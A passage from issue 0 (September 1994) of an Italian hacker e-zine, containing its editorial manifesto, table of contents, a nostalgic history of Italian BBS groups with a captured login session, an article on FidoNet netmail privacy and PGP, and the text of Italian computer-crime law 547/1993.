The Black Page Numero 0 - Settembre 1994 - La prima rivista ITALIANA di H/P/A/V/C/F/C/C HackingPhreakingAnarchyVirusCodezFuckingCellularCyberpunk ======== Redattore Capo, Editore : * Dupree's Paradise * * Remacoll's Group * Co-Redattore : Ice Mc / DTC Redattori - Collaboratori : Ace Hitman Italy ---------------------------------------------------------------------------- The Black Page - Numero 0, Settembre 1994 - ACP:COM Finalmente e' nata, questa dannata rivista ! Ora, due parole sui motivi che ci hanno spinto a creare un simile bollettino telematico. Questa rivista e' destinata ad un pubblico vasto, molto vasto, piu' vasto e' meglio e'. Lo scopo che ci prefiggiamo con questo bollettino piu' o meno periodico e' quello di diffondere un tipo di cultura telematica, quella *CREATIVA*, tra la gente che se ne vuole interessare. Una sorta di contro-corrente informativa in so- stanza, diretta a chiunque voglia CAPIRE di piu' su quel mondo fittizio che si trova al di la' delle nostre prese telefoniche. Speriamo che questa rivista telematica venga letta da tutte le persone possibili. Qui i System Administrators potranno apprendere come far fronte ai problemi di sicurezza dei loro sistemi, su come evitare violazioni della sud- detta sicurezza, come prevenire intrusioni, come risolvere bug di sistemi, ec- cetera eccetera, grazie ad articoli ed esempi appositamente pubblicati, in mo- do che possano effettivamente capire dove eventualmente possano sussistere delle falle nei loro grossi computers. Qui i 'ragazzini intraprendenti' po- tranno leggere ed imparare cosa vuol dire sicurezza dei sistemi, potranno ca- pire dove stanno i punti deboli dei piu' svariati tipi di computer, potranno imparare a utilizzare questi computer, cosa che potrebbe risultare loro molto utile per un futuro curriculum vitae (Immaginate la differenza di 2 curricu- lum, uno che riporta "Esperienza di lavoro in ambiente PC-DOS su WordStar 1.0" ed uno che riporta "Vasta conoscenza dei sistemi MSDOS, VAX-VMS, Unix, espe- rienza di manutenzione dei suddetti sistemi in particolar modo in relazione alla sicurezza informatica" ;) ) quando si presenteranno in qualche ditta in cerca di lavoro. Qui i poliziotti, i finanzieri, e le forze dell'ordine in ge- nerale, leggendo questi files, forse potranno capire realmente come stanno le cose in fatto di Pirateria, Accessi non autorizzati, Virus, e forse troveranno anche delle soluzioni ai loro problemi. Qui i Cyberpunk, gli Anarchici, i Di- versi, e tutte le persone con una forte apertura mentale in genere potranno trovare articoli fatti per loro, o DA LORO STESSI, se vorranno collaborare in- viando materiale. Questa rivista e' totalmente gratis, distribuibile su qualsiasi network. In questa rivista NON VENGONO ASSOLUTAMENTE PUBBLICIZZATI codici di accesso illegali a qualsiasi sistema, ne' carte di credito personali, ne' NIENTE che possa essere direttamente utilizzabile PER SCOPI ILLECITI. Su questa rivista spesso troverete articoli espliciti su svariati generi di cose, dai Virus, al- le Droghe, alle Armi, a tutto quello che potete immaginare. Queste informazio- ni pervengono alla nostra redazione da piu' fonti : Donazioni, Messaggi di po- sta elettronica, Lettere, Voci, Discussioni con amici o estranei, colloqui con barboni per la strada, ma anche libri o riviste facilmente reperibili. Se que- ste cose esistono nella comune stampa, crediamo di essere nel giusto pubbli- candole a modo nostro nella nostra rivista gratuita. Quindi per favore, non venite a romperci le palle dicendo che pubblichiamo virus o cazzate del gene- re. Pubblicheremo inoltre spesso dei trucchi di programmazione che permette- ranno di fare svariate cose con un computer, sia esso un Atari PC-Folio o un VAX della Digital. Inoltre daremo voce e spazio a chiunque abbia qualcosa da dire. Per questo sproniamo chiunque voglia contattarci, a farlo al piu' presto possibile. Dare- mo spazio ad articoli sulla realta' Cyberpunk Italiana, a poesie e composizio- ni, a pubblicita' gratuite di bbs varie, insomma a quello che vorremo. Date sfogo alla vostra fantasia ! Mandateci materiale ! Qualsiasi cosa che manderete verra' pubblicata SENZA VELI O CENSURE cosi' come viene ricevuta, tranne diversi accordi presi con gli autori. I "crediti" per tali articoli ricadranno esclusivamente sugli autori. In fondo, noi non pos- siamo far altro che prendere dei file ed incollarli insieme :) Bene, adesso e' ora di iniziare. ============================================================================= ----------------------------------------------------------------- The Black Page - Numero 0, Settembre 1994 - Indice generale INDICE DEGLI ARGOMENTI TRATTATI ------------------------------- In questo numero si parla di : ------------------------------ [1] Un pochino (ma molto poco) di STORIA a cura della Redazione [2] RETI NEL CICLONE a cura di ACE [3] FIDO BUST : Articoli, commenti, stronzate *[4] THE fingerd TROJAN HORSE by Hitman Italy *[5] MINCHIA.MAR, simpatico programmino in Assembler x VAX, scritto alle 5 del mattino by Dupree's Paradise [6] DOVE/COME/QUANDO/PERCHE' FARE TRASHING di Ice MC L'arte di scavare nell'immondizia per cercare cose carine :) [7] L'angolo SIP-TELECOM, Notizie fresche di cassonetto a cura di Ice MC e Dupree's [8] MARIA JUANA : Canapa Indiana, che sollievo da un articolo apparso su "Il Manifesto" a cura della Redazione [9] ARMI E BAGAGLI : Facciamo Casino con poco a cura della Redazione [10] CYBERSPACE - Articolo Mai Pubblicato di Luc Pac (from Decoder BBS) [11] LEONCAVALLO !!! SOLIDARIETA' !!!!!! Le Notizie che allo Stato non conviene far trapelare ... Fonti : ECN, messaggi su Decoder BBS [12] BSA : Un commento letto su Decoder BBS di M F B *[13] PGP CHAT : Un po' un casino, ma un buon spunto per sentirsi protetti from Decoder BBS [14] LE "NUOVE" TARIFFE ITAKAZ *[15] STRONZATE IN RETE a cura della Redazione * = Articoli tutti o in parte in lingua Inglese. ----------------------------------------------------------------- The Black Page - Numero 0, Settembre 1994 - Articolo 1 ====================================== = = = Panoramica sulla scena Telematica = = Underground Italiana ed Europea = = = = by = = * Dupree's Paradise * = = = ====================================== Questo articolo e' stato realizzato in collaborazione con le seguenti brave persone : NESSUNO. Bene, questa e' proprio la parte difficile. Parlare della scena italiana in un momento come questo e' una cosa strana e anche un po' difficile. Certo sono ormai passati i tempi d'oro in cui era abbastanza facile circolare nelle reti, c'era abbondanza di password e di sistemi, che da un anno e mezzo a que- sta parte pero' cominciano a mancare. Comunque, vogliamo provare a tracciare una panoramica della scena italia- na ? Beh, allora direi che ci vuole un po' di "storia" ... iniziando dal pas- sato, dalle prime BBS, i primi gruppi e tutte 'ste cazzate qua. Vi assicuro che e' stato un lavoro da pazzi andare a beccare tutti i diretti interessati e sentire i loro commenti ... almeno accendetemi un cero per onorarmi, oppure se volete recitate pure tutto il PRCD in piedi aull'altare di una chiesa, comple- tamente nudi :)))))))) Come non iniziare parlando del mitico Pier's Group ? Chi di voi lettori non ha mai letto i racconti di Twin Phreacks, farebbe bene a scaricarseli su- bito, dalla bbs DECODER, 02-29527597, aperta dalle 14 alle 8 del mattino. Li' ci sono proprio tutti ! Scritti dal mitico MF The Best, sono veramente esila- ranti. Beh, secondo il mio MODESTISSIMO parere, che sicuramente trovera' molte persone contrarie, il Pier's e' uno dei mitici gruppi che hanno segnato la scena italiana in campo HP, con la loro ormai leggendaria BBS. L'ambiente era veramente strano, particolare, la famosa "Area 7" in cui solo gli Elite pote- vano entrare era una cosa (per quei tempi) allucinante, in cui si trovavano chicche provenienti dagli USA. Del Pier's abbiamo recuperato giusto qualche capture, di cui vi spariamo qui qualcosa : -------------------------------CAPTURE START-------------------------------- atd CONNECT 1200 CONNECT 1200/NONE Welcome to AmiExpress BBS Version 1.1x You are connected to Node 0 at 1200 baud. Connect time is Thu May 07 14:28:45 1992 ANSI graphics (Y/n)? N __ ____________________ _____ __ _____________ / /\ ______ / \ / ___ \ / // ______ ___ \ /_/ / / ____/\ | E l i t e B B S | / /__/ // // /___ / /__/ /\ \_\/ / /____\/ \____________________/ / /____// // ____/\/ / __/ / /___ /\ / /\____/ // /____\/ / \ \_\/ _____/ / / /_/ / /_________//_/ / \_\ /______/ / \_\/ \_________\\_\/ \_\ \______\/ /\ _______ _____ __________ __ _____ S E L E C T E D / _____// ___ \ / ___ _ /\ / // ___ \ / \ / /____ / /__/ /\/ /\_/ // / // // /__/ /\ U S E R S O N L Y / //_ // / __/ / / // // / // // /____/ / / \ / /__/ // / \ \_\/ /_// // /_// // /\____\/ /__________\ /______//_/ / \_________/ \_____//_/ / \______\\_\/ \________\/ \____\\_\/ Sistema Privato per lo Scambio di Files/Messaggi Sede di MILANO (Node0) Aperto 24 ore su 24, 365 giorni/anno. BAUDRATES da 300 a 14400 BPS V42bis. SysOp and Supreme God : M F T H E B E S T Powerful Chat Lord : P I E R The Immortal CoSysOp : E N I A C The L e a d e r ! : P I X I E Enter your FULL Name: Xxxxxx'x Xxxxxxxx PassWord: ???????? __ / / __ /_/_____ __ ______ _______ ______ \ \ // _____/ / / / ____// ___ / /\ / ____/ \ \ /\ // /___ / / / / / / / / / \/\ / /___ \ \ / \ / \ __/ / / / / / / / / / /\ \\ __/ \ \/ /\ \/ / \ \____\ \____\ \____\ \__\ \ \ \ \/\ \\ \____ \ / \ / \_____\\_____\\_____\\______\ \ \ \_\\_____\ \/ \/ _________________________________\ \ /____________________________________\ A c c e s s o R e g o l a r e A u t o r i z z a t o HandShake : 14.4 KiloBauds HST V42bis Software : AmiExpress V1.1x , 9 Conferences Data Transfer : Zmodem Protocol: 9600 / 14400 BPS Only HardWare : A3000 Tower - CPU 68030 - 5 Megabytes RAM DATA STORAGE : Multi-HD System, 940 MegaBytes Online (Pause)...Space to Resume: Scanning Conference: Guru's Temple.....No mail today! Scanning Conference: MS-DOS Warez.....No mail today! (123456789) Conf Access: XX_X_XXXX Caller Num.: 5738 Lst Date On: 05-03-92 Security Lv: 10 # Times On : 6 Ratio DL/UL: 2/1 # Downloads: 1 # Uploads : 3 Bytes DL'd : 58020 Bytes UL'd : 20000000 Bytes Avail: 30000000 Conference 9: MS-DOS Warez Auto-ReJoined Highest Msg: 507 L/Msg. Read: 0 L/Msg. Auto: 507 Searching for LOSS CARRIER Files! /---------------------------\ | PIER'S GROUP BBS | \---------------------------/ C: Comment to Sysop D: Download files E: Enter Message F: File Listings G: Goodbye (logoff) H: Display Help J: Join a conference N: New files since a date O: Operator page. (Chat) R: Read Messages S: Your statistics U: Upload files UR: Upload resume V: View a Text file W: W(Edit) your stats X: Expert toggle Z: Zippy search for text T: Local Time ?: This Menu ZOOM: Zoom Mail (See Help File) M: - Change ANSI Mode Pier's Group BBS [9:MS-DOS Warez] Menu (27 mins. left): j _____ _____ _ _ _____ _____ _____ _____ _ _ _____ _____ _____ *****| *****| *|_ *| *****|*****| *****| *****| *| *| *****| *****| *****| *| *| *| **|_*| *|_ *|_ *|__*| *| **| *| *| *|_ *|___ *| *| *| *|*|*| ***| ***| *****| ***| *|*|*| *| ***| *****| *|___ *|__*| *| **| *| *|___ *|*| *|___ *| **| *|___ *|___ ____*| *****| *****| *| *| *| *****| *| *| *****| *| *| *****| *****| *****| 1. LAMERLAND - New Users 2. BEST AMIGA W A R E Z 3. ..NOT READY....... 4. CONSOLE FILES ONLY ! . 5. ....NOT READY..... 6. Cyberpunks' PHREAKING 7. The Segret Nest! 8. Sysops' Utilities 9. MS-DOS W A R E Z Conference Number: 7 Joining Conference: The Secret Nest User who have access to Conf #7 ______________________________________________________________________________ >-hacker-> Andrea Belli Astaroth Axe! Bluelight Burglar Capitan Uncino DEATHBRINGER DIRECT Dr.Creator Dupree's Paradise Eniac FLASH GORDON Federica GORDON GEKKO Genius goblin H.D.Case Hydra Ironside/tdt Jettero Heller Josh Longobard Lost found MF THE BEST Madman MarVin SR! Mark Anders NCS POISON Phoenix PiXiE Pier Pitagora RED MUSTANG Remacoll SCSI SEVEN /\/\ SIMONE NASA SUSPIRIA Silver Spring Spider Splatter TIMESCAPE TRON Tom-cat Ugo Belli Vale Baggins Yosh ZEN _/ane ______________________________________________________________________________ (Pause)...Space to Resume: Highest Msg: 527 L/Msg. Read: 490 L/Msg. Auto: 527 Pier's Group BBS [2:AMIGA Warez ] Menu (8 mins. left): j 8 Joining Conference: Guru's Temple TOP MESSAGE WRITERS Nr: Name: Group/Location: Msgs: Calls: 1 MF THE BEST Twin Phreaks 2281 1135 2 Jettero Heller MILANO! 1318 463 3 The Brain --> Five Aces <-- 876 274 4 Hydra Strange Land 532 94 5 SHADOWMAN << CHRONOS >> 503 270 6 SUSPIRIA BOLOGNA 306 542 7 FRANCO2 ROMA,ITALY 185 464 8 FLASH GORDON MILANO 185 229 9 Ugo Belli Milano ( Arese ) 179 45 10 alphabit Milano 172 214 Last Update: 05-02-92 11:38:55 -------------------------------END OF CAPTURE------------------------------- Bei tempi quelli ! Tempi in cui, se uno veniva scoperto a boxare per soli 20 km di distanza, veniva deletato dalla board immediatamente ... tempi in cui ogni upload-download doveva venire approvato ... tempi in cui si limitava al massimo qualsiasi sputtanamento di info, cosa che invece oggi e' ai massimi livelli, infatti non funge + un emerito cazzo. Ma comunque, certamente Pier's non era l'unica BBS in Italia ad avere un simile ambiente, ma altre cosi' se- rie non me ne ricordo. E se qualche stronzo mi avesse spedito del materiale, invece di continuare a chiedermi "ma ra rivista quando esce" o "ma se ci scri- vo solo io allora niente" adesso non stareste li' a dire "ma questo qui di re- censione non ha scritto un cazzo, c'erano un mare di altri gruppi". La prossi- ma volta invece di star li a farvi le seghe su Arky mandate del materiale ! Piuttosto se riscontrate delle stronzate mandatemi una mail dove volete, alla fine della mag ci sono tutti gli indirizzi. Ma comunque, gia' dalla schermata del Pier's si evince che c'era qualche gruppo. gli INC, i Twin Phreacks (ma esistevano realmente?), i TDT ed altri, di cui pregherei chiunque ha info di scrivermi una mail colle memberlist e le attivita'. Ricordiamo ad esempio gli Omega Team che hanno scritto l'ormai fa- mosa Box per Soundblaster, ma chi fossero i componenti, non se lo ricorda nes- suno. Oggi la scena e' ricoperta di gruppi piu' o meno vari. Ci sono i Techno- Brains, che ora non si sa + che cazzo fanno perche' pare che abbiano subito anche loro una inculata dal Fidobust, ma non vorrei sparar cazzate. Ci sono un casino di gruppi vari, ma siccome nessuno mi ha aiutato non posso star qui da solo ad enumerarli tutti. E comunque oramai i tempi sono cambiati. Non si puo' fare + un cazzo, o quasi. Faremmo bene, noi "vecchi", a rivederci qualcuno dei vecchi capture, per raccogliere lo spirito di quei tempi andati, in cui si lavorava con soli- darieta', e con uno spirito molto diverso da quello, di merda, che riempie molte bbs di oggi, in cui non si trova piu' niente oltre a giochini del cazzo per Amiga e IBM. Rimandiamo al prossimo numero per un articolo piu' esauriente sulla pano- ramica italiana. INVITIAMO PERTANTO TUTTI I GRUPPI ITALIANI E NON CHE VOGLIONO FAR PARTE DELLA NS RECENSIONE STORICA A FARCI PERVENIRE UN MESSAGGIO RELATIVO AL LORO GRUPPO, INDICANDO IL NOME, I MEMBRI, LE DATE DELLE FORMAZIONI, L'ATTI- VITA' DEL GRUPPO, EVENTUALI AZIONI MITICHE COMPIUTE DAL GRUPPO (HACKERAGGI, PROGRAMMI CREATI, DEMO, ECC.) ED ALTRO, AGLI INDIRIZZI DI POSTA ELETTRONICA RIPORTATI IN CODA AL FILE. IL PGP E' OVVIAMENTE OBBLIGATORIO :) Dupree's Paradise ----------------------------------------------------------------- PUBBLICITA' REGRESSO ==================== D E C O D E R B B S CyberNet INFORMATION FidoNet WANT 65:1200/1 TO BE 2:331/369 FREE Orari apertura 14:00 - 08:00 SUPPLEMENTO ELETTRONICO RIVISTA INTERNAZIONALE UNDERGROUND DECODER a cura della ShaKe Edizioni ----------------------------------------------------------------- The Black Page - Numero 0, Settembre 1994 - Articolo 2 -------------------- - Reti nel ciclone - -------------------- a cura di Ace - Questo articolo vuole essere l'introduzione ad una serie piu' lunga e complessa che si sviluppera' attraverso i prossimi numeri di TBP (se ci saranno :-). Oggetto delle nostre attenzioni saranno le reti di messaggistica amatoriali come FidoNet (ma non solo). Iniziamo con una premessa dedicata a chi, vivendo probabilmente su Marte, non conosce il fenomeno. FidoNet e' una rete amatoriale (ovvero gestita per passione e non a scopo di lucro), di bbs che nottetempo si scambiano pacchetti di messaggi seguendo tutta una serie di procedure note come "Fidonet Tecnology" e su cui non ci soffermeremo (se vi interessa procuratevi il file FidoNet.man). Il net (alias rete) offre una serie di aree messaggi ove gli utenti possono inserire i propri interventi e leggere quelli degli altri. I temi vanno dalle chiacchere generiche alle aree tecniche dedicate a sistemi hardware, programmazione, hobby etc. Sulla scia di FidoNet sono nate nel corso degli anni altre reti, alcune sempre generiche ed altre orientate a particolari tematiche come ad esempio le italiane PeaceLink (attivita' sociali, pacifismo, lotta alla mafia, etc), LudoNet (giochi), AmigaNet (Amiga Rulez!). La rete piu' estesa resta comunque Fido che, nata nel 1987 in USA, conta ormai nodi in tutti i continenti! A noi questo pero' non interessa poiche' intendiamo occuparci solo della realta' di casa nostra :-) Quasi tutti i net prevedono una policy ("politica") che descrive gerarchia della rete, norme di comportamento, pene per chi le infrange e molto altro. Chiodo fisso per la maggior parte dei net, ma soprattutto per Fido, e' la condanna assoluta della pirateria del software, cosa che avveniva anche prima che in Italia esistesse una vera legge in merito (il che e' abbastanza esilarante per la verita'). Nulla di male comunque. Se una cosa viene definita illegale chi vuole promuoverla deve evitare di coinvolgere coloro che invece non gradiscono. Il problema e' un altro: con la "scusa" di prevenire azioni illecite Fido tende a ridurre a zero la liberta' personale dei singoli utenti. Premesso che la rete e' composta da molti bravi e volonterosi Sysop attivi con l'unico scopo di divertirsi e diffondere gratuitamente la cultura del dialogo telematico tra le gente, in net si trovano anche elementi con scopi diversi. La gerarchia di rete consente di raggiungere un limitato (ma pur sempre effettivo) potere decisionale sulle azioni del prossimo e cio' non puo' che attirare chi, oltre alle chiacchere via modem, cerca il comando (o la dittatura). Fra le tante belle idee di queste persone (che per selezione naturale tendono a conquistare la maggior parte dei ruoli di coordinamento) vi e' l'assoluto annullamento della privacy personale. Ogni rete ha (forse e' meglio dire avrebbe), un'area privata, abitualmente chiamata matrix o NetMail, dove gli utenti possono scambiarsi messaggi che interessano solo mittente e destinatario. Bene, in FidoNet (non solo li, comunque) quest'area non e' privata ma viene letta praticamente dai Sysop di TUTTI i nodi attraverso cui il messaggio transita (perche' transita? Perche' se da MI scrivo ad un utente di NA il msg passa per una serie di BBS intermedie prima di arrivare a destinazione, ma anche per questo vale il consiglio di prima: leggetevi Fidonet.man!). Perche' questo monitoraggio? Semplice: pericolo di eversione (!!!) o svolgimento di attivita' illegali tramite la rete. Dunque i Sysop sono tenuti a controllare tutti i messaggi in transito per accertarsi che non contengano informazioni vietate dalla Policy. L'utilizzo di programmi come PGP (un crypter talmente potente che neppure la RSA americana e' stata in grado di decifrare i files da esso generati!) comporta l'immediata escluaione del bbs (del bbs, non dell'utente!) dalla rete. La paura fa 90... Ma paura di cosa? Qui viene il bello: i Signori dovrebbero preoccuparsi di quel che impongono attualmente, non di improbabili utilizzi eversivi della matrix! Per la legge italiana ognuno e' responsabile di quel che si trova sul suo hard disk. (lo so, e' assurdo ma andate a vedere chi e' il NOTO ESPERTO INFORMATICO che se l'e' inventato). Dunque, se domani il Signor Vertigo, tanto per fare un nome a caso (e' il RC di Fido per l'Italia), leggesse il mtx di un tizio che comunica ad un amico il piano per assaltare la sede della BSA, diventerebbe automaticamente complice dei due a meno di non sporgere immediata denuncia, cosa improbabile in quanto un file di testo ha poco valore come prova poiche' facilmente falsificabile. In questo senso sarebbe molto piu' sicuro per i Sysop stessi non solo evitare la lettura dei messaggi privati ma addirittura farli transitare cryptati via PGP o programma similare che in caso di bisogno consenta di dimostrare (compatibilmente con la conoscenza informatica dei magistrati), la forzata estraneita' del Sysop o, ancora meglio, impedisca proprio di scoprire il contenuto (eversivo :-) del messaggio. Un altro interessante spunto di analisi e' la recente legge 547 sulla telematica che estende la privacy postale ai messaggi elettronici. Secondo le interpretazioni dei Sysop di rete (che valgono quanto quelle della BSA sulla legge 518 relativa alla pirateria del software :-) questa non influisce assolutamente sul Sacro Diritto di leggere le matrix poiche' in policy e' chiaramente spiegato che per Fido il termine "privato" ha un significato abbastanza diverso da quello normale (!), riguarda infatti la possibilita' di far leggere il proprio messaggio non a tutti ma esclusivamente a destinatario ed... ai Sysop di tutti i nodi su cui passa (ero stufo di usare 'transita' :-) Nel prossimo numero (se ci sara') riferiro' gli esiti di una piccola ricerca legale che sto svolgendo in merito visto che le dichiarazioni di cui sopra non mi convincono affatto. Se cio' che ipotizzo verra' confermato saremo di fronte ad una gravissima limitazione della Nostra Liberta' Personale punibile a norma di legge, senza contare poi i rischi, descritti in precedenza, che i Sysop corrono quotidianamente. A questo punto pero' tengo a precisare che ne io ne chi mi sta aiutando a svolgere questa inchiesta intendiamo distruggere Fido o far finire nei guai chichessia. FidoNet e' un grande patrimonio collettivo. La presenza di soggetti parzialmente negativi non deve influire sull'indubbia utilita' della rete. L'inchiesta che stiamo svolgendo vuole solo chiarire come stanno le cose e capire se in net il rispetto delle leggi comprende solo la 518 o va anche oltre. Io utilizzo regolarmente FidoNet per quel che mi offre. Sogno di riuscire a cambiare certe assurdita' (non solo la privacy negata) ma in caso contrario non mi disperero' di certo anche perche' per i miei msg *privati* ho mezzi ben piu' sicuri ;-) Bene, vi lascio con una piccola curiosita': la privacy, assente per i matrix, e' invece assoluta per tutte le aree di coordinamento. Pensate solo che un umile CoSysop (che per DEFINIZIONE ha gli stessi poteri del Sysop) per accedervi deve addirittura inviare copia dei suoi dati (reali) a RC e REC, i quali, secondo metodi di giudizio personali, decideranno se la persona e' gradita o meno. In piu' chiunque acceda a tali aree (dove si vocifera circolino segreti di Stato importanti per la stabilita' Democratica della nazione) deve mantenere assoluto riserbo su quanto apprende, pena l'immediata esclusione dalla rete del BBS ed altri provvedimenti... alcuni citano l'evirazione, ma sono solo voci non confermate :-) Note e legenda -------------- Fidonet.man - e' un testo disponibile in molti BBS ed allegato agli archivi dei principali mailer e tosser (programmi per point e bbs). Se non lo trovate leggetevi la policy Fido che chiarisce ugualmente vari meccanismi di rete. Nei prossimi numeri, se possibile, ne analizzeremo insieme le parti piu' significative. BSA - associazione cui aderiscono varie sw houses. Si batte contro la pirateria del software. Se volete un'interpretazione obiettiva e aperta della 518 rivolgetevi pure a loro. Probabilmente vi diranno che anche sognare windows (bhe e' piu' un incubo che altro...) piratato e' illegale :-) MTX - Vedi matrix. RC - Regional Coordinator, il responsabile italiano per FidoNet. Per contattarlo matrixate a 2:331/301 c/o Vertigo. REC - Regional Echo Coordinator, il responsabile della gestione (apertura, chiusura, etc) aree echo. Il REC in carica, Adolfo Melilli, alloggia al 2:333/1. Con questo dovrebbe essere tutto. Saluti e alla prossima! Quasi dimenticavo: se volete contattarmi potete farlo lasciandomi un messaggio nella CPE di Edi BBS (X25 22950135 NRC) oppure via matrix presso: 2:331/368 (FidoNet, se volete che il vostro messaggio sia pubblico :-) 65:1200/7 (CyberNet, gia' piu' sicuro) Ci sarebbero altri 10 indirizzi ma penso che questi bastino! Bye! Ace [ N.d.r in relazione alla BSA e al (C) software vi consigliamo di leggere attentamente l'articolo 12 ;) ] ----------------------------------------------------------------- The Black Page - Numero 0, Settembre 1994 - Articolo 3 ------------------------------- - F I D O B U S T - ------------------------------- The Fidonet CrackDown by Dupree's (e che cazzo volete ? nessuno mi ha aiutato) E proprio perche' nessuno mi aiuta mi limitero' a postare qui alcuni mes- saggi catturati qua' e la', alcuni conosciuti, altri meno. Beccatevi sta ca- terva di bytes. Spero solo di avere piu' collaboratori per il prossimo numero. Mi rompe i coglioni fare tutto da solo. Fanculo il mondo. Incominciamo col il testo della famigerata e bastardissima "legge" ... --------------------------------------------------------------------------- LEGGE 23 Dicembre 1993, n.547 Modificazioni ed integrazioni alle norme del codice penale e del codice di procedura penale in tema di criminalita' informatica. La Camera dei Deputati e il Senato della Repubblica hanno approvato; Il Presidente Della Repubblica Promulga la seguente legge: Art. 1 1.- All'articolo 392 del codice penale, dopo il secondo comma e' aggiunto il seguente: Si ha, altresi', violenza sulle cose allorche' un programma informatico viene alterato, modificato o cancellato in tutto o in parte ovvero viene impedito o turbato il funzionamento di un sistema informatico o telematico. Art. 2 1.- L'articolo 420 del codice penale e' sostituito dal seguente: Art. 420 (Attentato a impianti di pubblica utilita').- Chiunque commette un fatto diretto a danneggiare o distruggere impianti di pubblica utilita', e' punito, salvo che il fatto non costituisca piu' grave reato, con la reclusione da uno a quattro anni. La pena di cui al primo comma si applica anche a chi commette un fatto diretto a danneggiare o distruggere sistemi informatici o telematici di pubblica utilita', ovvero dati, informazioni o programmi in essi contenuti o ad essi pertinenti. Se dal fatto deriva la distruzione o il danneggiameno dell'impianto o del sistema, dei dati, delle informazioni o dei programmi ovvero l'interruzione anche parziale del funzionamento dell'impianto o del sistema la pena e' della reclusione da tre a otto anni. Art. 3 1.- Dopo l'articolo 491 del codice penale e' inserito il seguente: Art. 491-bis (Documenti Informatici).- Se alcuna delle falsita' previste dal seguente capo riguarda un documento informatico pubblico o privato, si applicano le disposizioni del capo stesso concernenti rispettivamente gli atti pubblici e le scritture private. A tal fine per documento informatico si intende qualunque supporto informatico contenente dati o informazioni aventi efficacia probatoria o programmi specificatamente destinati ad elaborarli. Art. 4 1.- Dopo l'articolo 615-bis del codice penale sono inseriti i seguenti: Art. 615-ter (Accesso abusivo ad un sistema informatico o telematico).- Chiunque abusivamente si introduce in un sistema informatico o telematico protetto da misure di sicurezza ovvero vi si mantiene contro la volonta' espressa o tacita di chi ha il diritto di escluderlo, e' punto con la reclusione fino a tre anni. La pena e' della reclusione da uno a cinque anni: 1) Se il fatto e' commesso da un pubblico ufficiale o da un incaricato di pubblico servizio, con abuso dei poteri o con la violazione dei doveri inerenti alla funzione o al servizio, o da chi esercita anche abusivamente la professione di investigatore privato, o con abuso della qualita' di operatore di sistema; 2) Se il colpevole per commettere il fatto usa violenza sulle cose o alle persone, ovvero se e' palesemente armato; 3) Se dal fatto deriva la distruzione o il danneggiamento del sistema o l'interruzione totale o parziale del suo funzionamento, ovvero la distruzione o il danneggiamento dei dati, delle informazioni o dei programmi in esso contenuti. Qualora i fatti di cui ai commi primo e secondo riguardino sistemi informatici o telematici di interesse militare o relativi all'ordine pubblico o alla sicurezza pubblica o alla sanita' o alla protezione civile o comunque di interesse pubblico, la pena e', rispettivamente, della reclusione da uno a cinque anni e da tre a otto anni. Nel caso previsto dal primo comma il delitto e' punibile a querela della persona offesa; negli altri casi si procede d'ufficio. Art. 615-quater (Detenzione e diffuzione abusiva di codici di accesso a sistemi informatici o telematici).- Chiunque, al fine di procurare a se o ad altri un profitto o di arrecare ad altri un danno, abusivamente si procura, riproduce, diffonde, comunica o consegna codici, parole chiavi o altri mezzi idonei all'accesso ad un sistema informatico o telematico, protetto da misure di sicurezza, o comunque fornisce indicazioni o istruzioni idonee al predetto scopo, e' punito con la reclusione sino ad un anno e con la multa sino a lire dieci milioni. La pena e' della reclusione da uno a due anni e della multa da lire dieci milioni a venti milioni se ricorre taluna delle circostanze di cui ai numeri 1) e 2) del quarto comma dell'articolo 617-quater. Art. 615-quinques (Diffusione di programmi diretti a danneggiare o interrompere un sistema informatico).- Chiunque diffonda, comunica o consegna un programma informatico da lui stesso o da altri redatto, avente scopo o per effetto in danneggiamento di un sistema informatico o telematico, dei dati o dei programmi in esso contenuti o ad esso pertinenti, ovvero l'interruzione, totale o parziale, o l'arterazione del suo funzionamento, e' punto con la reclusione sino a due anni e con la multa sino a lire venti milioni. Art. 5 1.- Nell'articolo 616 del codice penale in quarto comma e' sostituito dal seguente: Agli effetti delle disposizioni di questa sezione, per "corrispondenza" si intende quella epistolare, telegrafica, telefonica, informatica o telematica ovvero effettuata con ogni altra forma di comunicazione a distanza. Art. 6 1.- Dopo l'articolo 617-ter del Codice penale sono inseriti i seguenti: Art. 617-quater (Intercettazione, impedimento o interruzione illecita di comunicazioni informatiche o telematiche).- Chiunque fraudolentemente intercetta comunicazioni relative ad un sistema informatico o telematico o intercorrenti tra piu' sistemi, ovvero le impedisce o le interrompe, e' punto con la reclusione da sei mesi a quattro anni. Salvo che il fatto non costituisca pii' grave reato, la stessa pena si applica a chiunque rivela, mediante qualsiasi mezzo di infoamzione al pubblico, in tutto o in parte, il contenuto delle comunicazioni di cui al primo comma. I delitti di cui al primo e secondo comma sono punibili a querela della persona offesa. Tuttavia si procede d'ufficio e la pena e' della reclusione da uno a cinque anni se il fatto e' commesso: 1) in danno a un sistema informatico o telematico utilizzato dallo Stato o da altro ente pubblico o da impresa esercente servizi pubblici o di pubblica necessita'; 2) da un pubblico ufficiale o da un incaricato di pubblico servizio, con abuso dei poteri o con la violazione dei doveri inerenti alla funzione o al servizio, ovvero con abuso della qualita' di operatore di sistema; 3) da chi esercita anche abusivamente la professione di investigatore privato. Art. 617-quinques (Installazione di apparecchiature atte a intercettare, impedire od interrompere comunicazioni informatiche o telematiche).- Chiunque, fuori dai casi consentiti dalla legge, installa apparecchiature atte ad intercettare, impedire o interrompere comunicazioni relative ad un sistema informatico o telematico ovvero intercorrenti tra piu' sistemi, e' punto con la reclusione da uno a quattro anni. La pena e' della reclusione da uno a cinque anni nei casi previsti dal quarto comme dell'articolo 617-quater. Art. 617-sexies (Falsificazione, alterazione o soppressione del contenuto di comunicazioni informatiche o telematiche).- Chiunque, al fine di procurare a se o ad altri un vantaggio o di arrecare ad altri un danno, forma falsamente ovvero altera o sopprime, in tutto o in parte, il contenuto, anche occasionalmente intercettato, di taluna delle comunicazioni relative ad un sistema informatico o telematico o intercorrenti tra piu' sistemi, e' punito, qualora ne faccia uso o lasci che altri ne facciano uso, con la reclusione da uno a quattro anni. La pena e' della reclusione da uno a cinque anni nei casi previsti dal quarto comme dell'articolo 617-quater. Art. 7 1.- Nell'articolo 621 del codice penale, dopo il primo comma e' inserito il seguente: Agli effetti della disposizione di cui al primo comma e' considerato documento anche qualunque supporto informatico contenente dati, informazioni o programmi. Art. 8 1.- L'articolo 623-bis del codice penale e' sostituito dal seguente: Art. 623-bis (Altre comunicazioni o conversazioni).- Le disposizioni contenute nella presente sezione, relative alle comunicazioni e conversazioni telegrafiche, telefoniche, informatiche o telematiche, si applicano a qualunque altra trasmissione a distanza di suoni, immagini o altri dati. Art. 9 1.- Dopo l'art. 635 del codice 